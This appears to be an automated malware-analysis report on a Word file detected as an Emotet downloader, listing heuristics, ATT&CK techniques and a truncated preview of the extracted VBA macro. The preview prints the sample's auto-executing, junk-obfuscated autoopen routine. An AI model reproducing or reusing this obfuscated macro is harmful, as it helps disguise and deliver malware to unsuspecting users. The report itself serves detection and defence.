MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6954529-0. Static analysis revealed the presence of an auto-executing VBA macro (autoopen) that utilizes GetObject, a common technique for downloading and executing payloads. The macro's obfuscated nature and the Emotet family attribution strongly suggest it's a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6954529-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6954529-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 63597 bytes |
SHA-256: a801be4ed305d32cb250383bf49937aaebcd3b78fa154addeb6abc80a780899e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "oGGQGZG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zADxxCk"
Attribute VB_Base = "0{8C95744E-5F3D-487F-964B-2747704AF649}{F4630A7E-3C1F-4513-B4F7-B4DE18C5AB21}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "EQ_A1AA"
Attribute VB_Base = "0{FBE467EA-ECFC-4E9B-9B9F-1C757376625A}{EC6E0ED7-893C-4A35-8279-76D07E27233A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iDXU_U"
Sub autoopen()
If oGZQQcBA = RBAAAAAA Then
QCZAk_XU = _
OBXCQXo - _
DQUw_A
ElseIf bx_CDBA = IAAAQ_1w Then
Select Case hwDCX4Z
Case 110416547
kx14cGDQ = _
517487929 * CUGAAx / _
55447786 * Hex(286699267 * _
Fix(BAGBAA / CStr(RB_kGA) * rAkDQUAX _
- Fix(605874879)) - 809429588 * Round(SB_AUAGw + _
Hex(lZ1AXDBA) / 740403290 - 526084163))
KcAwAA = N__XCQD + s_oADA4 * _
aAAGDAc / Sqr(YGZ_DXA) / 495070957 - _
Hex(FAUAwQ) + (876151266 / 54028840)
End Select
End If
If iBAwcA = iA4oQUA Then
LUx41CQ = _
WUUQUDAA - _
rDAwo1C
ElseIf ZZoAcDAD = Oo4DXxkA Then
Select Case b4UZQAAD
Case 473330313
TQGAAQ = _
385813594 * vUADAGAx / _
956930486 * Hex(211259763 * _
Fix(GADoAU / CStr(iAoCDA) * WC_AAkxA _
- Fix(460361378)) - 333027254 * Round(iUkAAX + _
Hex(PQ_kBAx) / 161780148 - 834367034))
lBA4xA = AAQU_BA + jAQXG4 * _
YAoUDBc / Sqr(HQDADQ) / 418849191 - _
Hex(MQDxBU) + (927220805 / 771565855)
End Select
End If
If XB4AGDA = fDABG1D Then
zcABABG = _
ix4cAGx - _
zBX__UA
ElseIf UAXokZAc = tUAA4_A4 Then
Select Case okB4QUQ
Case 374932734
Fw_B1AU = _
727810321 * MAQAAk / _
916045225 * Hex(696189695 * _
Fix(VD_DCAA4 / CStr(wD_4GACX) * EAUADA _
- Fix(589767319)) - 323050499 * Round(ZBQBkxQ + _
Hex(BUAAXXBo) / 950286003 - 579642724))
kBAoDU = ZGAA_wD4 + ioB1BQ1 * _
dZBAAC_ / Sqr(QGx4AA) / 403555160 - _
Hex(hAcDAc_) + (917381255 / 621976857)
End Select
End If
iAAcAA
If QBQBCAAU = WXX1kA Then
rQBAcGwA = _
EkoZAX4 - _
LAAcAAx_
ElseIf jBoUUAU = soDACAA Then
Select Case w_cGQA
Case 885621654
oQ4cXQA = _
168428296 * U_UxBX / _
756507822 * Hex(835455261 * _
Fix(SBXCoQ / CStr(zAAAUAA) * tGBoQAUc _
- Fix(670171378)) - 236109086 * Round(XQ4AGX + _
Hex(hDGDAwB) / 789002970 - 567246692))
GAUoAxk = pcw1AAZ + oxDcxXQx * _
iA4UAA / Sqr(Do_xB4DQ) / 658090868 - _
Hex(jwUQCQA) + (352399185 / 141728341)
End Select
End If
If JADxAC = zkQBwDk Then
dA11BQ = _
AQwkAxo - _
WAQAUZ
ElseIf dAQADA_o = iAU4Qx_A Then
Select Case NDDoAA
Case 939790074
KXCBAcD = _
526859553 * mQwCX1DB / _
812273676 * Hex(789707776 * _
Fix(ZDGAZAG / CStr(sGUQGA) * jX_AcG _
- Fix(256915025)) - 47304767 * Round(dGAkxUBU + _
Hex(oZxBCQoD) / 814872421 - 171342607))
f1X411Z = iAUDQAA + vcQBZkA4 * _
pAwcUA / Sqr(zUAQXA) / 480355762 - _
Hex(jQXcAA) + (135699430 / 251439582)
End Select
End If
If iA_UBkAQ = DwoQ4A Then
sAUAAAAD = _
D4ABGUwA - _
rZAAA_Ac
ElseIf bQAZxAAw = D_QZ_AX Then
Select Case JACXQCD
Case 517970095
sxG4BA = _
524895571 * c4_cAXU / _
361088872 * Hex(983684066 * _
Fix(q11U4UB / CStr(cGQ4AC) * sGAC_AC _
- Fix(960417603)) - 725145965 * Round(AABDDA + _
Hex(kAx_UXG) / 888935921 - 889020575))
DBQAZAXA = TAoAUAD + YQAUCk * _
cAQBAA / Sqr(P_ZDAA) / 435460802 - _
Hex(RAAU1B) + (305101739 / 921126950)
End Select
End If
En
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.